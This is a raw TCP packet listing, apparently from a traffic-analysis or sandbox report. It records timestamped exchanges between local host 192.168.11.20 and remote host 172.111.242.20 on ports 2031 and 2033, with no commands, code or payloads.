                                                                            Mar 21, 2022 14:46:16.414485931 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.414546967 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.414596081 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.414697886 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.414731026 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.414747953 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.414788961 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.414859056 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.414927006 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.420231104 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.420296907 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.420365095 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.420454979 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.420500994 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.420569897 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.420876980 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.421117067 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.423398018 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.423460007 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.423650980 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.424391985 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.424638033 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.427696943 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.427758932 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.427999020 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.428904057 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.429260969 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.429323912 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.429373026 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.429486036 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.429533005 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.433451891 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.433514118 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.433696985 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.435090065 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.435152054 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.435201883 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.435354948 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.435579062 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.435637951 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.435878992 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.439577103 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.439671040 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.439723969 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.439771891 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.439796925 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.439820051 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.439884901 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.440046072 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.440639973 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.440704107 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.440906048 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.444976091 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.445039988 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.445090055 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.445240974 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.445249081 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.445395947 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.445867062 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.449832916 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.450042963 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.452775955 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.453906059 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.453969002 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.454025030 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.454091072 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.454128027 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.454185009 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.455888987 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.455950975 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.456113100 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.457350969 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.457582951 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.457721949 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.457784891 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.457998037 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.458815098 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.459636927 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.459861040 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.459918976 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.460755110 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.460985899 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.461110115 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.468069077 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.468308926 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.472771883 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.472834110 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.472882986 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.473023891 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.476901054 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.476963043 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.477113008 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.478777885 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.478841066 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.478890896 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.479006052 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.479052067 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.479918957 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.480003119 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.480056047 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.480215073 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.482009888 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.482261896 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.484591007 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.484654903 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.484725952 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.484774113 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.484839916 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.484869003 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.484889984 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.484941006 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.484956980 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.485131025 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.487190008 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.487430096 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.487498045 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.488544941 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.488606930 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.488657951 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.488776922 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.488822937 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.490452051 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.491621971 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.491688967 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.491858006 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.492120981 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.492331028 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.497143030 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.497229099 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.497500896 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.497735977 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.500132084 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.500200033 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.500375986 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.503734112 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.503798962 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.503849983 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.503962994 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.504019976 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.509413958 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.517957926 CET497652033192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.518264055 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.518322945 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.518372059 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.518420935 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:16.518477917 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.518526077 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.565591097 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:16.611732006 CET203349765172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:19.956125021 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:19.999183893 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:19.999259949 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:19.999317884 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:19.999473095 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.003875971 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.003942013 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.004096031 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.004106998 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.004225016 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.004262924 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.009530067 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.009594917 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.009644985 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.009711981 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.009794950 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.010235071 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.010298967 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.010442972 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.010586977 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.016519070 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.016772032 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.019042969 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.019104958 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.019339085 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.020256042 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.020318031 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.020368099 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.020525932 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.022114992 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.022195101 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.022244930 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.022293091 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.022397041 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.022444010 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.024775982 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.024862051 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.024912119 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.024959087 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.025012970 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.025094032 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.025252104 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.025309086 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.025471926 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.026074886 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.026300907 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.027848959 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.027913094 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.028101921 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.028942108 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.031162977 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.031224966 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.031394958 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.032419920 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.032646894 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.034310102 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.034372091 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.034590960 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.035835981 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.036144972 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.036372900 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.037259102 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.038755894 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.038995028 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.041851044 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.041913033 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.042135954 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.044405937 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.045730114 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.046015978 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.047458887 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.048719883 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.048958063 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.048985004 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.050031900 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.050095081 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.050144911 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.050272942 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.050348043 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.051896095 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.051991940 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.052268982 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.054013968 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.055361032 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.055447102 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.055666924 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.057259083 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.057324886 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.057374001 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.057534933 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.057585955 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.060239077 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.060308933 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.060513973 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.061563969 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.061634064 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.061958075 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.064207077 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.065741062 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.065984011 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.071217060 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.071280956 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.071330070 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.071557999 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.072118998 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.072185040 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.072236061 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.072345018 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.072470903 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.078562975 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.079721928 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.079792976 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.079925060 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.079931021 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.080085993 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.081051111 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.081115961 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.081331015 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.085303068 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.085628986 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.085702896 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.085836887 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.086697102 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.086775064 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.086833000 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.086884022 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.086906910 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.087057114 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.087383986 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.087585926 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.090024948 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.090087891 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.090137959 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.090312958 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.092220068 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.092422009 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.093409061 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.095817089 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.096054077 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.096239090 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.096301079 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.096350908 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.096399069 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.096467018 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.096535921 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.096579075 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.096997976 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.097202063 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.102715015 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.103059053 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.103121042 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.103300095 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.103394985 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.103622913 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.108388901 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.108452082 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.108501911 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.108637094 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.109859943 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.109922886 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.110059977 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.111450911 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.111515045 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.111680031 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.113863945 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.113924980 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.113975048 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.114164114 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.114228964 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.116678953 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.117037058 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.117099047 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.117232084 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.117321014 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.117418051 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.118408918 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.118731976 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.118794918 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.118844032 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.118954897 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.119000912 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:46:20.121519089 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.122620106 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:46:20.122828007 CET497612031192.168.11.20172.111.242.20
